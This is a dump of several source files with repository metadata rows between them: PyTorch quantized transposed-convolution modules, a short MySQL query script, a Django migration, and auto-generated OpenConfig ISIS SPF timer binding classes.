For details on input arguments, parameters, and implementation see
:class:`~torch.nn.ConvTranspose1d`.
.. note:: Currently only the QNNPACK engine is implemented.
Please, set the `torch.backends.quantized.engine = 'qnnpack'`
For special notes, please, see :class:`~torch.nn.quantized.Conv1d`
Attributes:
weight (Tensor): packed tensor derived from the learnable weight
parameter.
scale (Tensor): scalar for the output scale
zero_point (Tensor): scalar for the output zero point
See :class:`~torch.nn.ConvTranspose2d` for other attributes.
Examples::
>>> torch.backends.quantized.engine = 'qnnpack'
>>> # With square kernels and equal stride
>>> m = nnq.ConvTranspose1d(16, 33, 3, stride=2)
>>> # non-square kernels and unequal stride and with padding
>>> m = nnq.ConvTranspose1d(16, 33, (3, 5), stride=(2, 1), padding=(4, 2))
>>> input = torch.randn(20, 16, 50)
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0, dtype=torch.quint8)
>>> output = m(q_input)
>>> # exact output size can be also specified as an argument
>>> input = torch.randn(1, 16, 12)
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0, dtype=torch.quint8)
>>> downsample = nnq.Conv1d(16, 16, 3, stride=2, padding=1)
>>> upsample = nnq.ConvTranspose1d(16, 16, 3, stride=2, padding=1)
>>> h = downsample(q_input)
>>> h.size()
torch.Size([1, 16, 6])
>>> output = upsample(h, output_size=input.size())
>>> output.size()
torch.Size([1, 16, 12])
"""
_FLOAT_MODULE = nn.ConvTranspose1d
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, output_padding=0, groups=1, bias=True,
dilation=1, padding_mode='zeros', device=None, dtype=None):
factory_kwargs = {'device': device, 'dtype': dtype}
kernel_size = _single(kernel_size)
stride = _single(stride)
padding = _single(padding)
dilation = _single(dilation)
output_padding = _single(output_padding)
super(ConvTranspose1d, self).__init__(
in_channels, out_channels, kernel_size, stride, padding, dilation,
True, output_padding, groups, bias, padding_mode, **factory_kwargs)
def _get_name(self):
return 'QuantizedConvTranpose1d'
def set_weight_bias(self, w: torch.Tensor, b: Optional[torch.Tensor]) -> None:
self._packed_params = torch.ops.quantized.conv_transpose1d_prepack(
w, b, self.stride, self.padding, self.output_padding, self.dilation,
self.groups)
def _weight_bias(self):
w, b = torch.ops.quantized.conv_transpose1d_unpack(self._packed_params)
return w, b
def weight(self):
(w, _) = self._weight_bias()
return w
def bias(self):
(_, b) = self._weight_bias()
return b
def forward(self, input):
# Temporarily using len(shape) instead of ndim due to JIT issue
# https://github.com/pytorch/pytorch/issues/23890
if len(input.shape) != 3:
raise ValueError("Input shape must be `(N, C, L)`!")
return torch.ops.quantized.conv_transpose1d(
input, self._packed_params, self.scale, self.zero_point)
class ConvTranspose2d(_ConvTransposeNd):
r"""Applies a 2D transposed convolution operator over an input image
composed of several input planes.
For details on input arguments, parameters, and implementation see
:class:`~torch.nn.ConvTranspose2d`.
For special notes, please, see :class:`~torch.nn.quantized.Conv2d`
Attributes:
weight (Tensor): packed tensor derived from the learnable weight
parameter.
scale (Tensor): scalar for the output scale
zero_point (Tensor): scalar for the output zero point
See :class:`~torch.nn.ConvTranspose2d` for other attributes.
Examples::
>>> # QNNPACK or FBGEMM as backend
>>> torch.backends.quantized.engine = 'qnnpack'
>>> # With square kernels and equal stride
>>> m = nnq.ConvTranspose2d(16, 33, 3, stride=2)
>>> # non-square kernels and unequal stride and with padding
>>> m = nnq.ConvTranspose2d(16, 33, (3, 5), stride=(2, 1), padding=(4, 2))
>>> input = torch.randn(20, 16, 50, 100)
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0, dtype=torch.quint8)
>>> output = m(q_input)
>>> # exact output size can be also specified as an argument
>>> input = torch.randn(1, 16, 12, 12)
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0, dtype=torch.quint8)
>>> downsample = nnq.Conv2d(16, 16, 3, stride=2, padding=1)
>>> upsample = nnq.ConvTranspose2d(16, 16, 3, stride=2, padding=1)
>>> h = downsample(q_input)
>>> h.size()
torch.Size([1, 16, 6, 6])
>>> output = upsample(h, output_size=input.size())
>>> output.size()
torch.Size([1, 16, 12, 12])
"""
_FLOAT_MODULE = nn.ConvTranspose2d
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, output_padding=0, groups=1, bias=True,
dilation=1, padding_mode='zeros', device=None, dtype=None):
factory_kwargs = {'device': device, 'dtype': dtype}
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
output_padding = _pair(output_padding)
super(ConvTranspose2d, self).__init__(
in_channels, out_channels, kernel_size, stride, padding, dilation,
True, output_padding, groups, bias, padding_mode, **factory_kwargs)
def _get_name(self):
return 'QuantizedConvTranpose2d'
def set_weight_bias(self, w: torch.Tensor, b: Optional[torch.Tensor]) -> None:
self._packed_params = torch.ops.quantized.conv_transpose2d_prepack(
w, b, self.stride, self.padding, self.output_padding, self.dilation,
self.groups)
def _weight_bias(self):
w, b = torch.ops.quantized.conv2d_unpack(self._packed_params)
return w, b
def weight(self):
(w, _) = self._weight_bias()
return w
def bias(self):
(_, b) = self._weight_bias()
return b
def forward(self, input):
# Temporarily using len(shape) instead of ndim due to JIT issue
# https://github.com/pytorch/pytorch/issues/23890
if len(input.shape) != 4:
raise ValueError("Input shape must be `(N, C, H, W)`!")
return ops.quantized.conv_transpose2d(
input, self._packed_params, self.scale, self.zero_point)
class ConvTranspose3d(_ConvTransposeNd):
r"""Applies a 3D transposed convolution operator over an input image
composed of several input planes.
For details on input arguments, parameters, and implementation see
:class:`~torch.nn.ConvTranspose3d`.
.. note:: Currently only the FBGEMM engine is implemented.
Please, set the `torch.backends.quantized.engine = 'fbgemm'`
For special notes, please, see :class:`~torch.nn.quantized.Conv3d`
Attributes:
weight (Tensor): packed tensor derived from the learnable weight
parameter.
scale (Tensor): scalar for the output scale
zero_point (Tensor): scalar for the output zero point
See :class:`~torch.nn.ConvTranspose3d` for other attributes.
Examples::
>>> torch.backends.quantized.engine = 'fbgemm'
>>> # With cubic kernels and equal stride
>>> m = nnq.ConvTranspose3d(16, 33, 3, stride=2)
>>> # non-cubic kernels and unequal stride and with padding
>>> m = nnq.ConvTranspose3d(16, 33, (3, 3, 5), stride=(2, 1, 1), padding=(4, 2, 2))
>>> input = torch.randn(20, 16, 50, 100, 100)
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0, dtype=torch.quint8)
>>> output = m(q_input)
>>> # exact output size can be also specified as an argument
>>> input = torch.randn(1, 16, 12, 12, 12)
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0, dtype=torch.quint8)
>>> downsample = nnq.Conv3d(16, 16, 3, stride=2, padding=1)
>>> upsample = nnq.ConvTranspose3d(16, 16, 3, stride=2, padding=1)
>>> h = downsample(q_input)
>>> h.size()
torch.Size([1, 16, 6, 6, 6])
>>> output = upsample(h, output_size=input.size())
>>> output.size()
torch.Size([1, 16, 12, 12, 12])
"""
_FLOAT_MODULE = nn.ConvTranspose3d
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, output_padding=0, groups=1, bias=True,
dilation=1, padding_mode='zeros', device=None, dtype=None):
factory_kwargs = {'device': device, 'dtype': dtype}
kernel_size = _triple(kernel_size)
stride = _triple(stride)
padding = _triple(padding)
dilation = _triple(dilation)
output_padding = _triple(output_padding)
super(ConvTranspose3d, self).__init__(
in_channels, out_channels, kernel_size, stride, padding, dilation,
True, output_padding, groups, bias, padding_mode, **factory_kwargs)
def _get_name(self):
return 'QuantizedConvTranpose3d'
def set_weight_bias(self, w: torch.Tensor, b: Optional[torch.Tensor]) -> None:
self._packed_params = torch.ops.quantized.conv_transpose3d_prepack(
w, b, self.stride, self.padding, self.output_padding, self.dilation,
self.groups)
def _weight_bias(self):
w, b = torch.ops.quantized.conv3d_unpack(self._packed_params)
return w, b
def weight(self):
(w, _) = self._weight_bias()
return w
def bias(self):
(_, b) = self._weight_bias()
return b
def forward(self, input):
# Temporarily using len(shape) instead of ndim due to JIT issue
# https://github.com/pytorch/pytorch/issues/23890
if len(input.shape) != 5:
raise ValueError("Input shape must be `(N, C, T, H, W)`!")
return ops.quantized.conv_transpose3d(
input, self._packed_params, self.scale, self.zero_point)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
55f8f0d9a4d02a624dfc1d1931ebe55eca75f4a1 | c6ca3fd35bd0e36ab1c3427bd4dfd55fd8cff0f7 | /2020/october/1/11-Oct/mysql(17).py | fd61ec2fe274cb61f84bcc0724e5769b0c5bfbcc | [] | no_license | mohanbabu2706/testrepo | 23ae942d1af4bfbc31c9266daadfd8f9dce431a6 | 5d75d9c65f7174a7418cdc3d00580b99a11f67d0 | refs/heads/master | 2023-01-03T23:48:56.365958 | 2020-11-01T06:38:46 | 2020-11-01T06:38:46 | 300,142,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 350 | py | import mysql.connector
mydb = mysql.connector.connect(
host = "localhost",
user = "myusername",
password = "mypassword",
database = "mydatabase",
)
mycursor = mydb.cursor()
sql = "SELECT * FROM customers ORDER BY name DESC"
mycursor.execute(sql)
myresult = mycursor.fetchall()
for x in myresult:
print(x)
| [
"noreply@github.com"
] | mohanbabu2706.noreply@github.com |
d4dc2c5f7f03abab95daa5989886ca06a7db4c6c | d7589054c9dbcccdfee4213fda2df10f249a60a8 | /blogposts/migrations/0002_auto_20190622_1254.py | 457e9049564ff51cde1fcc2835f3ba4312831161 | [] | no_license | Ruckaiya/djangoblog | aa3e16ce84f37a70b830a795acf450b04b5c5bca | a76c5d223477d29b391915c3778219a36f9f34ce | refs/heads/master | 2020-06-09T00:26:51.396663 | 2019-06-23T10:47:43 | 2019-06-23T10:47:43 | 193,334,047 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 523 | py | # Generated by Django 2.2.2 on 2019-06-22 06:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blogposts', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='latestpost',
name='timestamp',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='popular',
name='timestamp',
field=models.DateTimeField(),
),
]
| [
"ruckaiya.awf5@gmail.com"
] | ruckaiya.awf5@gmail.com |
ca2b1b48748cf7dbf82a3c4d89d82d047927b481 | 70cdf0741a22c678401a306229003bf036ffe5a6 | /ocbind/network_instances/network_instance/protocols/protocol/isis/global_/timers/spf/config/__init__.py | e04f44eb1c83f1fb35643a331525799b5ac14be0 | [] | no_license | zsblevins/nanog81-hackathon | 5001e034339d6b0c6452ae2474f06916bcd715cf | 1b64fd207dd69837f947094fbd6d6c1cea3a1070 | refs/heads/main | 2023-03-03T09:39:28.460000 | 2021-02-15T13:41:38 | 2021-02-15T13:41:38 | 336,698,856 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,458 | py | # -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS SPF timers configuration.
"""
__slots__ = ('_path_helper', '_extmethods', '__spf_hold_interval','__spf_first_interval','__spf_second_interval',)
_yang_name = 'config'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__spf_hold_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
self.__spf_first_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
self.__spf_second_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['network-instances', 'network-instance', 'protocols', 'protocol', 'isis', 'global', 'timers', 'spf', 'config']
def _get_spf_hold_interval(self):
"""
Getter method for spf_hold_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_hold_interval (uint64)
YANG Description: SPF Hold Down time interval in milliseconds.
"""
return self.__spf_hold_interval
def _set_spf_hold_interval(self, v, load=False):
"""
Setter method for spf_hold_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_hold_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_hold_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_hold_interval() directly.
YANG Description: SPF Hold Down time interval in milliseconds.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_hold_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_hold_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_hold_interval(self):
self.__spf_hold_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
def _get_spf_first_interval(self):
"""
Getter method for spf_first_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_first_interval (uint64)
YANG Description: Time interval in milliseconds between the
detection of topology change and when the SPF algorithm runs.
"""
return self.__spf_first_interval
def _set_spf_first_interval(self, v, load=False):
"""
Setter method for spf_first_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_first_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_first_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_first_interval() directly.
YANG Description: Time interval in milliseconds between the
detection of topology change and when the SPF algorithm runs.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_first_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_first_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_first_interval(self):
self.__spf_first_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
def _get_spf_second_interval(self):
"""
Getter method for spf_second_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_second_interval (uint64)
YANG Description: Time interval in milliseconds between the first and second
SPF calculation.
"""
return self.__spf_second_interval
def _set_spf_second_interval(self, v, load=False):
"""
Setter method for spf_second_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_second_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_second_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_second_interval() directly.
YANG Description: Time interval in milliseconds between the first and second
SPF calculation.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_second_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_second_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_second_interval(self):
self.__spf_second_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
spf_hold_interval = __builtin__.property(_get_spf_hold_interval, _set_spf_hold_interval)
spf_first_interval = __builtin__.property(_get_spf_first_interval, _set_spf_first_interval)
spf_second_interval = __builtin__.property(_get_spf_second_interval, _set_spf_second_interval)
_pyangbind_elements = OrderedDict([('spf_hold_interval', spf_hold_interval), ('spf_first_interval', spf_first_interval), ('spf_second_interval', spf_second_interval), ])
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS SPF timers configuration.
"""
__slots__ = ('_path_helper', '_extmethods', '__spf_hold_interval','__spf_first_interval','__spf_second_interval',)
_yang_name = 'config'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__spf_hold_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
self.__spf_first_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
self.__spf_second_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['network-instances', 'network-instance', 'protocols', 'protocol', 'isis', 'global', 'timers', 'spf', 'config']
def _get_spf_hold_interval(self):
"""
Getter method for spf_hold_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_hold_interval (uint64)
YANG Description: SPF Hold Down time interval in milliseconds.
"""
return self.__spf_hold_interval
def _set_spf_hold_interval(self, v, load=False):
"""
Setter method for spf_hold_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_hold_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_hold_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_hold_interval() directly.
YANG Description: SPF Hold Down time interval in milliseconds.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_hold_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_hold_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_hold_interval(self):
self.__spf_hold_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
def _get_spf_first_interval(self):
"""
Getter method for spf_first_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_first_interval (uint64)
YANG Description: Time interval in milliseconds between the
detection of topology change and when the SPF algorithm runs.
"""
return self.__spf_first_interval
def _set_spf_first_interval(self, v, load=False):
"""
Setter method for spf_first_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_first_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_first_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_first_interval() directly.
YANG Description: Time interval in milliseconds between the
detection of topology change and when the SPF algorithm runs.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_first_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_first_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_first_interval(self):
self.__spf_first_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
def _get_spf_second_interval(self):
"""
Getter method for spf_second_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_second_interval (uint64)
YANG Description: Time interval in milliseconds between the first and second
SPF calculation.
"""
return self.__spf_second_interval
def _set_spf_second_interval(self, v, load=False):
"""
Setter method for spf_second_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_second_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_second_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_second_interval() directly.
YANG Description: Time interval in milliseconds between the first and second
SPF calculation.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_second_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_second_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_second_interval(self):
self.__spf_second_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
spf_hold_interval = __builtin__.property(_get_spf_hold_interval, _set_spf_hold_interval)
spf_first_interval = __builtin__.property(_get_spf_first_interval, _set_spf_first_interval)
spf_second_interval = __builtin__.property(_get_spf_second_interval, _set_spf_second_interval)
_pyangbind_elements = OrderedDict([('spf_hold_interval', spf_hold_interval), ('spf_first_interval', spf_first_interval), ('spf_second_interval', spf_second_interval), ])
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS SPF timers configuration.
"""
__slots__ = ('_path_helper', '_extmethods', '__spf_hold_interval','__spf_first_interval','__spf_second_interval',)
_yang_name = 'config'
